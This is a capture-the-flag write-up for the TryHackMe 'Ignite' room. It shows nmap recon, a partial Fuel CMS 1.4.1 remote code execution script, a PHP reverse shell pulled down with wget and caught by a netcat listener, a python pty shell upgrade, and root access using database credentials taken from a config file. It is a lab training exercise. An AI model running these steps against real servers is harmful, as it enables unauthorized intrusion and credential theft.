Ignite is a room that has no instructions other than to get two flags: User.txt and Root.txt, essential a black-box.  No hand-holding or guiding of any sort.  Let’s put everything we’ve learned up til this point and hack the box!

Scan the Box

The first thing we should do is perform a network scan with nmap.  This will show us all the open ports and services running. 

$ nmap  x.x.x.x -A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 11:00 PDT
Nmap scan report for x.x.x.x 
Host is up (0.22s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.11 seconds
 

There is a web server on port 80; we are met with this welcome page.  Looks like this is a fresh install of Fuel CMS, a content management system framework.  Note this is version 1.4.

Nmap also shows an Apache/2.4.18 service running. 

Research

Let’s see what kind of vulnerabilities we can find for these particular services. 

 

Apache/2.4.18

I found a ‘logrotate’ Local Privilege Escalation exploit.

This involves running the script on the web server and waiting for the logrotate command to rotate logs at 6:25AM, reboot the Apache server, and set the SUID bit on the Python 3 binary, allowing us to run Python 3 commands as root (Let’s revisit this later).

 

Fuel CMS 1.4

I found a remote code execution exploit for Fuel CMS <= 1.4.1.  This is a Python 2 script which allows PHP Code Evaluation via the pages/select/ filter parameter.  We can send commands to the server which will be executed in a shell and the results returned in the http response body. 

 

Execution

Let’s download the python script from exploit-db and change the URL to match the target machine’s IP. 

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "CHANGE THIS TO TARGET MACHINE IP AND PORT"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start
    
...
 

Run the python script.  We are met with a command line.  Here, we can send commands to the web server and the output of the commands are returned in the http response.  Let’s see what directory we are in.

cmd: pwd
/var/www/html
...
<html response body> 

Our goal is to get a reverse shell on the machine.  We can upload it to the current working directory and access it directly in the browser without specifying additional directories in the URL. 

We can find a compatible php reverse shell script here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

The reverse shell script must be modified such that it connects to our host machine on a specified port.  The host machine IP is the IP Tryhackme’s VPN assigns you.  This can be found at https://tryhackme.com/access.

 

...
set_time_limit (0);
$VERSION = "1.0";
$ip = 'x.x.x.x';  // CHANGE THIS
$port = 1235;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
... 

To transfer the reverse-shell script, we can start a python SimpleHTTPServer on our host machine, and use wget command to download the file.

Note that whatever directory you start the python http server is same directory we can download from, so make sure to start the python server in the same directory as your php-reverse-shell.php file.

Then we can start netcat on the specified reverse-shell port in listen mode, navigate to the reverse-shell file path in the web browser, and boom we have a reverse shell. 

Host machine:
$python -m SimpleHTTPServer 8000

------------------------------------
Target machine:
cmd: wget http://[host_ip]:8000/php-reverse-shell.php

------------------------------------
Host machine:
$nc -nlvp <port from reverse-shell script>

------------------------------------
Host machine web browser:
http://[machine_ip]/php-reverse-shell.php

------------------------------------
*netcat output*
Listening on 0.0.0.0 1235
Connection received on 10.10.245.169 59774
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:49:50 up 26 min,  0 users,  load average: 1.49, 1.21, 0.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

First Flag

Search server for first flag. The room says to find “User.txt”, but there’s no file matching that name in any directory we have access to.

Let’s search for all .txt files in directories we have access to.

$ find / -type f -name *.txt 2>/dev/null
...
/home/www-data/flag.txt
... 

Cat the contents of the file, and that’s the first flag!

Root Access

In step 2 of ‘Getting Started’ on the home page of the web server, it describes instructions to set up the database and where the config file is located.

The configuration file includes the root user’s credentials, including the password!

One problem – the current netcat shell we are using does not have TTY, and without it, we cannot interact and login as root.  

In order to spawn a TTY shell, there are various methods, depending on what services are on the system, and what permissions you have.  A resource I found is here: 

The command that works in our case is:

 

python -c 'import pty; pty.spawn("/bin/sh")' 

Now that we have a proper interactive TTY shell, we can su to root, input the password, and finally cat out the contents of root.txt to get the final flag.  

Leave a Reply